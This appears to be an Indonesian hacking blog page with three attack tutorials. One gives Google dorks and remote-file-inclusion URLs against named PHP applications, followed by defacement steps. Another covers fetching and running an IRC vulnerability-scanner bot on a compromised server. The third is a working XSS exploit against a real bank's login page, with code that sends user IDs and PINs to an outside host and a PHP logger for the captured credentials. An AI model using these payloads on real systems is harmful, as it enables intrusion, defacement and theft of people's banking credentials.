    pwd = Mengetahui Di Directory mana Kita Berada

    uname -a = Keberadaan Path berada

    w = Mengetahui Siapa Saja yang telah menggunakan Shell.


    curl = mendownload url


    [EvilShellInject] = inject rshell / c99 kamu


    Baiklah kita mulai dengan PHP karena PHP banyak sekali BUG nya..di antaranya :


    Googling ajah, sebelumnya cari dulu RFI di http://www.milw0rm.com


    - Site Oneadmin RFI


    Kamu Search di Google masukkan Kata Kunci oneadmin site:.com / oneadmin site:com

    nah sekarang saya kasi contoh pathnya … http://target.com/oneadmin/config.php?path[docroot]=



    Contoh :

    http://target.com/oneadmin/config.php?path[docroot]=[EvilShellInject]


    - PnPhpBB2


    Kamu Search di Google masukkan Kata Kunci modules.php powered by pnphpbb2 site:.com / modules.php powered by pnphpbb2 site:.net atau apa saja yang kalian suka atau kehendaki…


    nah sekarang saya kasi contoh pathnya … http://target.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[EvilShellInject]


    Contoh :

    http://www.sikhe.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[EvilShellInject]



    - Support Ticket


    Kamu Search di Google masukkan Kata Kunci include/main.php site:.com / include/main.php site:.net atau apa saja yang kalian suka atau kehendaki…

    nah sekarang saya kasi contoh pathnya … http://target.com/include/main.php?config[search_disp]=true&include_dir=


    Contoh : … http://target.com/include/main.php?config[search_disp]=true&include_dir=[EvilShellInject]


    Hehehe Lumayan banyak kan ? Nah selamat mencobanya..

    Neh aku kasi beberapa web yang telah berhasil saya Deface..



    Nah setelah itu buadlah sebuad file: index.html


    Isi dengan:

    <html>

    Hacked by Nama Kamu

    </html>


    Kemudian upload deh file ke directorynya


    kemudian buka website yang telah di deface:

    http://target.com/lokasipathnya/index.html


    Enjoy




    Free Template Blogger collection template Hot Deals SEO
    • Digg
    • Del.icio.us
    • StumbleUpon
    • Reddit
    • RSS

    Bikin Bot Scanner WebVuln Untuk IRC


    Kembali Lagi Ketemu Ma Gwe.. Bikin Tutorial Lagi Neh, Masih Ajah Ada yang Request Tentang ini..


    “Gimana cara bikin bot scanner om?” Katanya di #BINUSHACKER @ IRC.DAL.NET



    Masya Allah, cape deh.. Hare gene masih scan? Kzkzkz.. Btw, karena udah janji ni ane bikinin tutorialnya segala macem scanner.. Kzkzkz..


    Silakan Bisa Dipake :)


    Tapi jangan lupa settingny ya, coz dah ada yang gw udah rubah:


    Download / List Scanner dibawah ini:


    Silakan Klick Disini Aje Untuk List / Download


    Oke klo udah loe setting setting smuanya:


    Cara jalaninya mudah.. Ikutin Step By Step berikut ini


    1. Copy paste dan simpan script yang Gwe beri di geocities ato web anda kedalam


    format txt, ato anda juga bisa langsung menggunakan milik Gwe


    2. Masuk ke shell anda – Siapin cemilan dolo.. Byr enakan dikit


    3. Cari direktori yang memberikan permission 777 dengan command: find / -perm 777 -type d


    4. Jika ga ada, langsung aja menuju direktori /tmp ato /var/tmp


    5. Wget script bot dari web geocities Gwe ato dari tempat anda. Gwe pake contoh punya rekan Gwe, jadi commandnya: wget http://www.shopsmartcard.com/includes/js/tabs/files/scanner.txt


    6. Jika ga berhasil, coba pake command lwp-download tapi dengan url yang lengkap, commandnya: lwp-download http://www.shopsmartcard.com/includes/js/tabs/files/scanner.txt


    7. Kalo ga bisa juga, pakailah fitur uploadnya karena Gwe menggunakan r57 ato c99. dan uploadlah script botnya dengan fitur tersebut. jika belum punya filenya, donlot aja dari http://www.shopsmartcard.com/includes/js/tabs/files/scanner.txt


    8. Gwe anggep script tersebut udah di upload ye! Jalaninya gampang, perintahnya: perl scanner.txt


    9. Jika berhasil, bot langsung join di channel loe.



    10. Abis itu tinggal ketik seperti biasa: !scan bugnya dorknya   contoh: !scan index.php?page= index.php?page=


    11. Silahkan tunggu ampe targetnya ketemu.. Kekeke.. Enjoy dah xD


    KETERANGAN:

    1. Ini adalah tutor untuk pembuatan bot scan RFI pada web hasil inject & buad di IRC

    2. Tutor ini hanya berjalan pada mesin Linux ato keluarga UNIX

    3. Semua command di atas harap diperhatikan


    SEMOGA BERMANFAAT DAH..


    JANGAN LUPA Visit Us di #BINUSHACKER @ IRC.DAL.NET

    KLO MASIH ADA PERTANYAAN – BINUSHACKER TEAM YANG LAEN SIAP MEMBANTU ANDA


    ==== EOF ====



    Free Template Blogger collection template Hot Deals SEO
    • Digg
    • Del.icio.us
    • StumbleUpon
    • Reddit
    • RSS

    Security KlikBCA – Recover Password With XSS


    Sudah baca majalah Underground Info ? Di majalah itu ada artikel yang ditulis oleh S’to tentang XSS di halaman login klikbca.com. Dalam tulisan ini saya bahas lebih jauh lagi dan saya berikan contoh exploit yang cukup berbahaya dari vulnerability yang ditemukan S’to di majalah tersebut.

    Maaf artikel ini bukan XSS basics, tentang apa itu XSS nanti saya akan bahas di artikel khusus.



    Sebenarnya XSS termasuk bug yang gawat dan susah diantisipasi, namun XSS juga bug yang paling sering diremehkan. Karena berbeda dengan bug lain seperti SQL Injection yang menyerang server, bug ini tidak berpengaruh sama sekali terhadap server. XSS hanya menyerang client, yaitu pengguna web application.


    Mungkin mereka berpikir apa sih hal terburuk yang bisa menimpa server dengan XSS? Memang tidak secara langsung, namun ingat satu bug bisa di-exploit dengan 1001 macam cara yang semakin lama semakin efektif. Anda akan terkejut menyadari bahwa bug “seremeh” ini ternyata bisa diexploit sedemikian rupa.


    The Vulnerability


    xss bug


    Bug XSS ini akan muncul bila kita memasukkan username dan password yang salah. Ketika kita salah mengisi password, maka akan muncul dialog box yang memberitahu bahwa password kita salah.


    URL ketika password kita salah adalah:


    https://ibank.klikbca.com/authentication.do?value(actions)=logout&value(strError)=Mohon masukkan User ID/Password Anda yg benar \n (Please enter Your correct User ID/Password)


    URL tersebut akan menghasilkan source html sebagai berikut:


    <script>

    var err=‘User ID harus Alpha Numerik/User ID must be Alpha Numeric’

    alert(err);

    iBankForm.action=‘login.jsp’;


    iBankForm.submit();

    </script>


    Perhatikan bahwa setelah var err ditutup dengan karakter kutip (’). Jadi kalau kita ingin meng-injeksikan tag html atau javascript lain, kita harus tutup dulu dengan karakter (’). Mari kita coba untuk menampilkan dialog box berisi cookie dengan URL berikut:


    https://ibank.klikbca.com/authentication.do?value(actions)=logout&value(strError)=TEST';alert(document.cookie);<!--

    URL di atas menghasilkan source html berikut:












    1
    2
    3
    4
    5
    6

    <script type=“text/javascript”>

    var err=‘TEST’;alert(document.cookie);<!–


    alert(err);

    iBankForm.action=’
    login.jsp‘;

    iBankForm.submit();

    </script>


    Proses injeksi tersebut bisa dijelaskan dalam gambar berikut ini (klik gambar untuk lebih detil):



    klikbca3


    Oke saya rasa cukup main-mainnya, saya tidak terlalu suka cookie, saya ingin lebih dari itu, saya ingin username dan password.


    Strategy and Tactics


    Strategi yang saya pakai untuk mendapatkan username dan password sangatlah sederhana, yaitu dengan mengirimkan password dan username pada saat user meng-klik tombol submit. Untuk bisa menjalankan strategi itu saya menggunakan taktik berikut:



    1. Meng-intercept klik tombol submit

    2. Mengirimkan user dan password ke server saya

    3. Mencatat user dan password di server saya


    Intercepting Submit Button



    Saya menemukan kendala dalam mengintercept submit button. Kalau kita lihat pada source htmlnya button submit, kita akan temukan bahwa event onclick sudah di-hook untuk fungsi Login_Form_Validator. Setelah saya coba-coba, saya tidak bisa mengubah onclick itu ke fungsi lain.











    1
    2
    3

    <input type=“Submit” value=“LOGIN” name=“value(Submit)”


    onclick=“javascript:return Login_Form_Validator(document.frmParam)”

    onmouseover=“this.style.cursor=’hand’” />


    Fungsi Login_Form_Validator digunakan untuk melakukan validasi awal apakah kita mengisi user dan password sesuai format yang benar.




    var blnSubmitted = false;

    function Login_Form_Validator( theForm ) {

    document.forms[0]['value(user_id)'].autocomplete = ‘off’;

    document.forms[0]['value(pswd)'].autocomplete = ‘off’;



    var blnResponse = false;

    if (blnSubmitted) {

    return false;


    }


    var strErrMsg = “”;

    if( document.forms[0]['value(user_id)'].value == ) {


    alert(“Silakan mengisi User ID anda/Please input your User ID”);

    document.forms[0]['value(user_id)'].focus();


    return false;

    }

    if( document.forms[0]['value(user_id)'].value.length>12) {


    alert(“User ID/Password Anda salah / Your User ID/Password is Wrong”);

    document.forms[0]['value(user_id)'].select();


    document.forms[0]['value(user_id)'].focus();

    return false;


    }


    if(document.forms[0]['value(pswd)'].value == ) {


    alert(“Silakan mengisi PIN anda/Please input your PIN”);

    document.forms[0]['value(pswd)'].focus();


    return false;

    }

    if(document.forms[0]['value(pswd)'].value.length<6) {


    alert(“PIN harus 6 Angka/PIN must be 6 digits”);

    document.forms[0]['value(pswd)'].focus();


    return false;

    }


    //if(strErrMsg != ”) {

    // alert(strErrMsg);

    // return false;

    //}


    //blnSubmitted = confirm(”Click OK to login.”);


    if ( !blnSubmitted ) {

    blnSubmitted = true;

    blnResponse = true;


    }


    //if(’< %= blnLogout %>’==’true’)

    //blnResponse = false;


    return blnResponse;

    }




    Saya berpikir, bila mengubah onclick button ke fungsi lain tidak bisa, berarti kita harus menimpa fungsi Login_Form_Validator dengan fungsi kita sendiri. Biarkan event onclick button submit mengarah pada Login_Form_Validator, namun fungsi tersebut sudah kita ubah dengan code kita sendiri. Dengan kata lain kita define fungsi dengan nama yang sama, namun isi yang berbeda. Apakah itu akan menimbulkan dualisme fungsi? Iya tentu saja, karena satu fungsi yang sama tidak boleh di-definisikan dua kali.


    Setelah saya perhatikan source htmlnya, ternyata saya diuntungkan dengan posisi fungsi Login_Form_Validator yang berada di baris paling bawah. Jadi yang saya lakukan adalah saya definisikan fungsi dengan nama Login_Form_Validator, dan kemudian saya buat browser untuk mengabaikan semua javascript di baris selanjutnya. Dengan cara ini fungsi Login_Form_Validator yang dikenal browser adalah Login_Form_Validator versi saya. Untuk itu saya tambahkan tag <noscript> dan tag awal komentar <! agar javascript pada baris sesudahnya diabaikan browser.


    Jadi URL untuk menjalankan taktik saya di atas adalah:



    https://ibank.klikbca.com/authentication.do?value(actions)=login&value(strError)=TEST';function Login_Form_Validator(theForm){alert('TEST');return false;}</script><noscript><!--



    URL tersebut menghasilkan source html berikut:



    <script>

    var err=‘TEST’;function Login_Form_Validator(theForm){alert(‘TEST’);return false;}</script><noscript><!–


    alert(err);

    iBankForm.action=’
    login.jsp‘;

    iBankForm.submit();

    </script>



    function overridden


    Untuk menguji versi Login_Form_Validator manakah yang dipakai, klik tombol LOGIN tanpa mengisi username dan password. Ternyata yang muncul adalah dialog box “TEST”. Itu berarti fungsi yang berlaku adalah versi saya, HORE! Kalau versi aslinya, muncul peringatan bahwa user dan password harus diisi. Oke taktik pertama sukses. Mari kita Lanjut ke taktik ke-2.


    Sending username and password



    Oke, sekarang ketika user mengklik submit, code kita akan di-eksekusi. Now what? Selanjutnya tentu saja kita harus membuat code untuk mengirimkan user dan password pada saat user mengklik tombol submit. Untuk bisa mengirimkan data, berarti kita harus membuat browser melakukan request ke server saya. Saya menggunakan image untuk tujuan itu. Lho kok image? Iya karena ketika browser menemukan tag image, saat itu juga browser akan melakukan request GET ke server tempat image itu berada sesuai isi atribut SRC. Namun hal yang lebih penting lagi adalah, bila kita ubah atribut src dari object image dengan javascript, maka browser akan mengirimkan request GET sekali lagi. Request ini yang lebih penting, bukan request GET image pertama ketika halaman diload.


    Saya definisikan tag image dengan dimensi 1×1 agar invisible, dengan nama myimage sebagai berikut:



    <img src=http://www.ilmuhacking.com/testcapture.php name=“myimage” width=“1″ height=“1″>



    Sedangkan variabel yang berisi username dan password adalah:



    document.forms[0]['value(user_id)'].value

    document.forms[0]['value(pswd)'].value



    Agar bisa mengirimkan user dan password, saya harus mengubah atribut src myimage menjadi:



    'http://www.ilmuhacking.com/testcapture.php?userid='+document.forms[0]['value(user_id)'].value+'&passwd='+document.forms[0]['value(pswd)'].value


    Selanjutnya saya harus membuat fungsi Login_Form_Validator mengubah atribut src myimage, agar ketika submit button di-klik maka atribut src myimage akan berubah dan browser akan melakukan request GET ke isi atribut src. Hal yang tricky adalah jika return dari fungsi Login_Form_Validator adalah false, browser baru akan melakukan request image. Bila tidak, browser akan mengabaikan perubahan atribut src, dan tetap melakukan submit.


    Untuk menyiasatinya, saya terpaksa membuat agar button submit harus di klik 2x. Pada klik yang pertama tidak terjadi submit sesungguhnya, hal ini saya manfaatkan untuk mengubah atribut src myimage dan mengirim username/password ke server saya. Pada klik ke-2, browser baru melakukan submit yang sesungguhnya. Agak aneh memang, tapi saya yakin kebanyakan user tidak akan menyadari dan akan melanjutkan dengan meng-klik sekali lagi.


    Saya buat satu variabel abc yang bernilai false pertama kali. Pada klik pertama, nilai abc menjadi true, sehingga pada klik ke-2 fungsi tidak mengembalikan nilai false. Fungsi Login_Form_Validator adalah sebagai berikut:




    var abc=false;

    function Login_Form_Validator(theForm {

    if (!abc) {


    document.images.myimage.src=http://www.ilmuhacking.com/testcapture.php+‘?userid=’+document.forms[0]['value(user_id)'].value+‘&passwd=’+document.forms[0]['value(pswd)'].value;


    abc = true;

    return false;

    }

    }


    Kini sudah lengkap semua yang dibutuhkan, siap untuk diinjeksikan melalui URL sebagai berikut:



    https://ibank.klikbca.com/authentication.do?value(actions)=login&value(strError)=TEST';var abc=false;function Login_Form_Validator(theForm){if (!abc) {abc=true;document.images.myimage.src='http://www.ilmuhacking.com/testcapture.php?userid='%2Bdocument.forms[0]['value(user_id)'].value%2B'%26passwd='%2Bdocument.forms[0]['value(pswd)'].value;return false;}}</script><img name="myimage" src="http://www.ilmuhacking.com/testcapture.php" width="1" height="1"><noscript><!--


    URL di atas adalah EXPLOIT. Tugas attacker adalah membuat orang lain yang ingin login, meng-klik melalui link tersebut. Ada banyak cara untuk itu. Salah satunya adalah dengan membuat link dengan anchor text di samarkan, seperti ini:


    Klik di sini untuk login.



    Bila kita coba isi dengan username:abc1234 dan password:123456. Maka pada klik pertama akan ada request GET ke URL berikut ini:


    http://www.ilmuhacking.com/testcapture.php?userid=abc1234&passwd=123456


    Baru pada klik ke-2, username dan password tersebut di-submit dengan request POST ke server yang benar.


    Saving User and Password


    Sekarang bagian yang paling mudah, yaitu menyimpan username dan password yang masuk. Dalam contoh ini saya gunakan URL www.ilmuhacking.com/testcapture.php


    Saya menyimpan user dan password dalam file capture.txt. Kode PHP yang saya gunakan untuk menyimpan user dan password adalah sebagai berikut:












    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11

    <?php

    $file=fopen(“capture.txt”,“a+”);


    $userid=$_GET["userid"];

    $passwd=$_GET["passwd"];

    $ipaddr=$_SERVER["REMOTE_ADDR"];


    $now = date(“Ymd H:i:s”);

    if (!empty($userid)) {


    fwrite($file,$userid =&amp;gt; $passwd (at $now from $ipaddr)\n);


    }

    fclose($file);

    ?>


    Kesimpulan


    Ternyata bug yang di-remehkan seperti XSS sekalipun, bila di-exploit bisa jadi berbahaya. Saya telah buktikan dengan contoh sederhana ini. Di tangan orang yang tepat celah sekecil apapun bisa menjadi masalah besar. Pesan saya: Never Underestimate Vulnerabilities



    Penggunaan enkripsi https sama sekali tidak berguna dalam kasus ini. Karena https hanya menjamin authentication dan confidentiality saja.


    =================== [ EOF ] =====================



    Thanks for Rizki from IlmuHacking [IHC]

    Dedicated to BinusHacker Member & All Of You



    Free Template Blogger collection template Hot Deals SEO
    • Digg
    • Del.icio.us
    • StumbleUpon
    • Reddit
    • RSS
    Free Doll 18 Glitter MySpace Cursors at www.totallyfreecursors.com